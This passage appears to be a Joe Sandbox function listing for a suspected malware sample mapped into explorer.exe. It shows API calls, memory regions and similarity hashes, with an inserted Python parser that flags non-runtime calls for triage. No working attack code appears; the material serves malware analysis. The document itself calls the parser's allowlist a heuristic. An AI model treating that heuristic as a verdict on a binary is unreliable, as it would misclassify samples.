• WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00797451
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00797491
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00797539
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLastOutput
• String ID:
• API String ID: 1735259414-0
APIs
• _free.LIBCMT ref: 00793A51
• _free.LIBCMT ref: 00793A6C
• _free.LIBCMT ref: 00793A77
• _free.LIBCMT ref: 00793B84
  • Part of subcall function 0079A21A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007969C2,00000001,00000364,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84), ref: 0079A25B
• _free.LIBCMT ref: 00793B59
  • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
  • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
• _free.LIBCMT ref: 00793B7A
Similarity
• API ID: _free$Heap$AllocateErrorFreeLast
• String ID:
• API String ID: 4150789928-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0078950F
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0078957A
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00789597
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007895D6
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00789635
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00789658
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
• API String ID: 2829165498-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 007844A5
• std::_Lockit::_Lockit.LIBCPMT ref: 007844C7
• std::_Lockit::~_Lockit.LIBCPMT ref: 007844E7
• __Getctype.LIBCPMT ref: 0078457D
• std::_Facet_Register.LIBCPMT ref: 0078459C
• std::_Lockit::~_Lockit.LIBCPMT ref: 007845B4
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
• String ID:
• API String ID: 1102183713-0
APIs
• GetLastError.KERNEL32(?,007AB85D,0078C69B,0078AD34,00787A49,3F07E9DB,?,?,?,00000000,007AC427,000000FF,?,00762576,?,?), ref: 0078C6B2
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0078C6C0
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0078C6D9
• SetLastError.KERNEL32(00000000,?,00000000,007AC427,000000FF,?,00762576,?,?,0000000F,00763BA5,00000000,0000000F,00000000,007ABDB0,000000FF), ref: 0078C72B
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 504881566fa92e16e2b951f6fe3cb8bd2d3588f684ac6c650da3f547429c388b
                                                                                                        • Instruction ID: 3ac2a6c8c5aaea0c24384b6253dff52e672bba697d267d9c6340c39d0913ba74
                                                                                                        • Opcode Fuzzy Hash: 504881566fa92e16e2b951f6fe3cb8bd2d3588f684ac6c650da3f547429c388b
                                                                                                        • Instruction Fuzzy Hash: 6A0124322887199EAA2637747C8DE672B44EB017B1334033EF111900F1EF6E5C419764
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free_strpbrk
• String ID: *?
• API String ID: 3300345361-2564092906
• Opcode ID: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
• Instruction ID: 7d1e5f8ba12bc692ced128a63c2c7ebf86fecf8d7bc240a90e6c4259fb4fad5a
• Opcode Fuzzy Hash: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
• Instruction Fuzzy Hash: 1C614CB5E00219AFDF14CFA8D8819EDFBF5EF49310B24816AE845E7340D635AE418BA0
APIs
• __Mtx_unlock.LIBCPMT ref: 00785BE7
• std::_Rethrow_future_exception.LIBCPMT ref: 00785C39
• std::_Rethrow_future_exception.LIBCPMT ref: 00785C49
  • Part of subcall function 00763A60: __Mtx_unlock.LIBCPMT ref: 00763B54
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: Mtx_unlockRethrow_future_exceptionstd::_
• String ID: 5|
• API String ID: 3298230783-531852093
• Opcode ID: 1dc70139d722e8e2c9f8ec678defff2caf6982ca93a70db71c3f8f1cb1beea88
• Instruction ID: 341db6591b7136cedc903c028310de71917f70d9e42306fe7a680cc8303d38f7
• Opcode Fuzzy Hash: 1dc70139d722e8e2c9f8ec678defff2caf6982ca93a70db71c3f8f1cb1beea88
• Instruction Fuzzy Hash: D0413A71D407089BDB14FBA4D849BAFBBA8AF15300F40456EF54367642EB39A548C7B2
Strings
• C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe, xrefs: 0079F0EE
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
• API String ID: 0-1978484262
• Opcode ID: 5c5446fc6b9d2903fd09af04f49d6b8a14eaf3c477ea78fe10ad7a40636a3dfb
• Instruction ID: 0064e380ed8c5c378aa506ac07519111eed498706f2ce663eb51289ecf26c5eb
• Opcode Fuzzy Hash: 5c5446fc6b9d2903fd09af04f49d6b8a14eaf3c477ea78fe10ad7a40636a3dfb
• Instruction Fuzzy Hash: 5B219F71644209EFEF20AF65EC85DAB77ADEF013A47104624F428D6251DB38DC4087E0
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 0076499F
  • Part of subcall function 0078AD46: RaiseException.KERNEL32(E06D7363,00000001,00000003,007625DC,007808E7,8B18EC83,?,007625DC,?,007C357C), ref: 0078ADA6
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: ExceptionRaise___std_exception_copy
• String ID: 85|$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 3109751735-2855507302
• Opcode ID: 54afa325be7efd8835d882b6b0cd55c6c8794af70bc90dbdef17bdead65ef9d1
• Instruction ID: 4e489aa87371eeb6eed1fd635c4c6c1089d289cb07d7e0f0e246a860a259ff56
• Opcode Fuzzy Hash: 54afa325be7efd8835d882b6b0cd55c6c8794af70bc90dbdef17bdead65ef9d1
• Instruction Fuzzy Hash: D51103B1640705AFC714DF68C806B96B3E8AF51310F10C53AFD568B681E7B8F914CB91
APIs
• FreeLibrary.KERNEL32(00000000,?,?,0078D7B8,?,?,00000000,?,?,0078D86A,00000002,FlsGetValue,007B23E8,007B23F0,?), ref: 0078D787
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: cc022fac397f51ec379b61b1a2aaddc00a318c07c0ef433127685fc71a8ddf7a
• Instruction ID: c64be7dec321f3d0d9d9a2cd01f235e55c5178ebaf7ff55e8a17053e20fce96e
• Opcode Fuzzy Hash: cc022fac397f51ec379b61b1a2aaddc00a318c07c0ef433127685fc71a8ddf7a
• Instruction Fuzzy Hash: 8911A575A81721ABDF326B789C49B5E77A4AF01B70F254620E911E72C0E77CED008BD5
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0078DB87,?,?,0078DB4F,00000000,00000000,?), ref: 0078DBA7
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0078DBBA
• FreeLibrary.KERNEL32(00000000,?,?,0078DB87,?,?,0078DB4F,00000000,00000000,?), ref: 0078DBDD
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: e4fd2d0ae6447be26bfcd45c85660d04375e4346e4a2afc1df641b732532d4b5
• Instruction ID: bd44d3b4823d3b56fda5127230fe1fa2f5ef8a732162eba0f997ac2a6b915173
• Opcode Fuzzy Hash: e4fd2d0ae6447be26bfcd45c85660d04375e4346e4a2afc1df641b732532d4b5
• Instruction Fuzzy Hash: BCF01C71641218FBDB21AB50DD0DFDE7FA9EB04756F158164F401E22A0CB788E01DBD4
APIs
  • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
  • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
• _free.LIBCMT ref: 007956AD
• _free.LIBCMT ref: 007956C6
• _free.LIBCMT ref: 00795704
• _free.LIBCMT ref: 0079570D
• _free.LIBCMT ref: 00795719
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: _free$ErrorLast
• String ID:
• API String ID: 3291180501-0
• Opcode ID: b975fd6b016cc6ec34347a1a9ceddaa310f750087c3944da5f8ae69e9618ddb6
• Instruction ID: eb5751a17b39da4ea04170beecdadda188f4031e9ea3d72584df6ee4d87f402f
• Opcode Fuzzy Hash: b975fd6b016cc6ec34347a1a9ceddaa310f750087c3944da5f8ae69e9618ddb6
• Instruction Fuzzy Hash: DAB16B75A01629DFDF25DF18D888AA9B7B5FF08314F6045ADE84AA7350D738AE90CF40
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
• String ID:
• API String ID: 3354401312-0
• Opcode ID: 33abd6a09a2b4d49abd08b9150abf87aac3de54f228a45800620ab3d1e6c6cc3
• Instruction ID: 478e2d9c0edcb1772404e4682e7b67513e7598cfc0ae949404257161688d6e72
• Opcode Fuzzy Hash: 33abd6a09a2b4d49abd08b9150abf87aac3de54f228a45800620ab3d1e6c6cc3
• Instruction Fuzzy Hash: AF618170D41209DFDF14EFA4C958BAEBBF4BF04704F2441A9E805A7342DB39AA05CBA1
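Every entry in this listing has the same shape: the Win32 and runtime calls a lifted function makes, each with its call-site address; the memory-dump region the function was recovered from; and the opcode and API-string hashes used for similarity lookups. The parser below is an added example written for this page, not Joe Sandbox's code and not code recovered from the sample. It turns entries in that layout into records, decodes the dump-file name into process index, base address, page protection and region type, and separates runtime boilerplate from functions that call something the MSVC runtime would not call on its own. The dump-name field order and the meaning of the protection and type fields are assumptions taken from the Windows PAGE_* and MEM_* constants; they agree with the entries above (0x20 PAGE_EXECUTE_READ for the 0x761000 code range, 0x02 read-only for the 0x760000 header and the 0x7B0000 range, 0x04 read-write for 0x7C5000, 0x08 write-copy for 0x7D2000, and 0x01000000 MEM_IMAGE throughout), but the two fields that do not fit those constants are left undecoded. The sample text is constructed from three of the entries on this page, trimmed to the lines the parser consumes, and the CRT allowlist is a triage heuristic, not a verdict.

```python
"""Parse Joe Sandbox per-function report entries for triage. Added example, not Joe Sandbox's code.
ASSUMPTION: .sdmp names are proc.stage.seq.base.protect.?.type.? with protect/type holding the
Windows PAGE_*/MEM_* constants; the two '?' fields are left undecoded."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR", or "• Part of subcall function ADDR: ..."
API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?(?P<name>[\w:]+)"
                    r"\.(?P<module>[A-Z0-9_]+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")
DUMP_RE = re.compile(r"(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.\d+\.(?P<base>[0-9A-F]{16})"
                     r"\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<mtype>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp")
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
RUNTIME_LIBS = {"LIBCMT", "LIBVCRUNTIME", "LIBCPMT"}
# Win32 calls the MSVC runtime issues on its own (startup, exit path, C++ exception throw).
CRT_WIN32 = {"GetLastError", "SetLastError", "FreeLibrary", "RaiseException", "GetModuleHandleExW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                      # absolute call-site address inside the dumped image
    via_subcall: str | None = None


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # Memory Dump Source + Similarity lines
    region: dict = field(default_factory=dict)

    @property
    def opcode_id(self) -> str | None:         # None when the entry is cut off on the page
        return self.fields.get("Opcode ID")


def decode_region(m: re.Match) -> dict:
    protect = int(m["protect"], 16)
    return {"process_index": int(m["proc"], 16), "stage": int(m["stage"], 16),
            "base": int(m["base"], 16), "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
            "executable": bool(protect & 0xF0), "type": MEM_TYPE.get(int(m["mtype"], 16), m["mtype"])}


def parse_entries(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    cur = section = None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in HEADERS:
            # "Similarity" closes an entry; any other header after it opens the next one.
            if cur is None or (section == "Similarity" and line != "Similarity"):
                entries.append(cur := FunctionEntry())
            section = line
        elif cur is None or not line:
            continue
        elif section == "APIs":
            if m := API_RE.match(line):
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"].split(",") if m["args"] else [],
                                        int(m["ref"], 16), m["sub"]))
        elif section == "Strings":
            cur.strings.append(line.lstrip("• "))
        elif m := FIELD_RE.match(line):
            cur.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Source File" and (d := DUMP_RE.search(m["val"])):
                cur.region = decode_region(d)
    return entries


def crt_makes(call: ApiCall) -> bool:
    """Heuristic: a call the MSVC runtime issues itself (its exit path resolves CorExitProcess by hand)."""
    return (call.module in RUNTIME_LIBS or call.name in CRT_WIN32
            or (call.name == "GetProcAddress" and "CorExitProcess" in call.args))


def needs_review(entry: FunctionEntry) -> bool:
    """Flag functions calling anything beyond runtime boilerplate; no listed APIs means not flagged."""
    return not all(crt_makes(c) for c in entry.apis)


# Constructed sample: three entries from this page, trimmed; the last is cut off after its API ID.
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0078DB87,?,?,0078DB4F,00000000,00000000,?), ref: 0078DBA7
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0078DBBA
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• Opcode ID: e4fd2d0ae6447be26bfcd45c85660d04375e4346e4a2afc1df641b732532d4b5
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 0076499F
  • Part of subcall function 0078AD46: RaiseException.KERNEL32(E06D7363,00000001,00000003,007625DC,007808E7,8B18EC83,?,007625DC,?,007C357C), ref: 0078ADA6
Similarity
• API ID: ExceptionRaise___std_exception_copy
APIs
• CoInitialize.OLE32(00000000), ref: 0076F317
• CoCreateInstance.OLE32(007BD064,00000000,00000001,007BD0C4,?), ref: 0076F333
Similarity
• API ID: Uninitialize$CreateInitializeInstance
"""
ENTRIES = parse_entries(SAMPLE)
```

Under this heuristic the first two sample entries come out as runtime code and only the CoInitialize / CoCreateInstance function is flagged; the GetModuleHandleExW(mscoree.dll) plus GetProcAddress(CorExitProcess) pair is the MSVC CRT checking for a loaded CLR on its exit path, and RaiseException with code E06D7363 is the C++ throw. The ref values are absolute addresses inside the image mapped at 0x760000, so subtracting the region base gives the RVA to look up in the dumped PE. In the flagged entry the first and fourth CoCreateInstance arguments, 007BD064 and 007BD0C4, are pointers to the CLSID and IID in that image, which this listing does not resolve, and the third argument 00000001 is CLSCTX_INPROC_SERVER.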
APIs
• CoInitialize.OLE32(00000000), ref: 0076F317
• CoCreateInstance.OLE32(007BD064,00000000,00000001,007BD0C4,?), ref: 0076F333
• CoUninitialize.OLE32 ref: 0076F341
• CoUninitialize.OLE32 ref: 0076F400
• CoUninitialize.OLE32 ref: 0076F414
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
• Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_760000_explorer.jbxd
Similarity
• API ID: Uninitialize$CreateInitializeInstance
                                                                                                        • String ID:
                                                                                                        • API String ID: 1968832861-0
                                                                                                        • Opcode ID: ff82224e73b3a68b3b9e65876fe11e1330e347c89afae4061b5aeed143b76b8e
                                                                                                        • Instruction ID: 78489e363db3b3c1f4cc35649e80bc887a386fff033095b1f429623987b8fa3d
                                                                                                        • Opcode Fuzzy Hash: ff82224e73b3a68b3b9e65876fe11e1330e347c89afae4061b5aeed143b76b8e
                                                                                                        • Instruction Fuzzy Hash: 4F51B671A00109DFDB04DF69DC89BEE7BB5EF48314F108128F906E7291D778A944CBA1
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00784C36
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00784C56
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00784C76
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00784D11
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00784D29
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                        • String ID:
                                                                                                        • API String ID: 459529453-0
                                                                                                        • Opcode ID: 0138187148e2fb3f969a3f319d8d887853588a4d721525991dfe5ee1f64e4876
                                                                                                        • Instruction ID: 56a7671f64a77875e7137bf2f318b5d878945519c95ceeb1f9613d4236e39826
                                                                                                        • Opcode Fuzzy Hash: 0138187148e2fb3f969a3f319d8d887853588a4d721525991dfe5ee1f64e4876
                                                                                                        • Instruction Fuzzy Hash: 0441D071A40216DBCB24EF54D845BAEBBB4FF04710F14816EE8066B351EB79AD01CBD5
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A0975
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 007A0987
                                                                                                        • _free.LIBCMT ref: 007A0999
                                                                                                        • _free.LIBCMT ref: 007A09AB
                                                                                                        • _free.LIBCMT ref: 007A09BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: e3b71cac2566a7a10d481f685f522786ee2b583ad8ea493d1dd30b360343430a
                                                                                                        • Instruction ID: 23079d1ba913820d215a1279aa64b78a2f7d99a6bf3fecc96f3bcf01b69fe85e
                                                                                                        • Opcode Fuzzy Hash: e3b71cac2566a7a10d481f685f522786ee2b583ad8ea493d1dd30b360343430a
                                                                                                        • Instruction Fuzzy Hash: EFF0FFB2519600EB9E29DF64F985C1B73EDBB427517644D09F048E7611C72DFC808AE4
                                                                                                        APIs
                                                                                                        • RemoveDirectoryA.KERNEL32(00000000), ref: 00776770
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryRemove
                                                                                                        • String ID: 0Ry=$2$246122658369
                                                                                                        • API String ID: 597925465-49898293
                                                                                                        • Opcode ID: b51cc8a8dba0a7071226864ff51814fc25dd1b4d1368043ebfc54b207e326fd0
                                                                                                        • Instruction ID: 26eb05676749f6e1ce76ef7062909aa54f1ca4820b45c677c81345e50b3a13d0
                                                                                                        • Opcode Fuzzy Hash: b51cc8a8dba0a7071226864ff51814fc25dd1b4d1368043ebfc54b207e326fd0
                                                                                                        • Instruction Fuzzy Hash: 94B1F8713105489BEF2DDF28CD8979C7A22EB82344F64C25CE84D9B3DAD73DA6808B55
                                                                                                        APIs
